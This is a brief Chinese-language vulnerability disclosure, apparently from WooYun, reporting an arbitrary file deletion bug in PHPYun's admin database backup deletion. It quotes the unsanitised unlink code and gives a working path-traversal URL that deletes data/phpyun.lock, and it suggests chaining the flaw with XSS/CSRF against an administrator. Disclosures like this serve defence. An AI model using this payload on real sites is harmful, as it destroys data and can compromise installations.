### 简要描述:
PHPYun任意文件删除漏洞
### 详细说明:
/admin/model/database.class.php,44行开始;
```
function del_action(){
extract($_GET);
$delid=@unlink(CONFIG_PATH."backup/".$sql);
```
$_GET,$sql没有做过滤,直接可任意删除文件;
### 漏洞证明:
可利用../等跨目录删除任意文件;
例:http://yun.wooyun.org/admin/index.php?M=database&C=del&sql=../../data/phpyun.lock
结合XSS/CSRF,管理员点击后可以触发;
暂无评论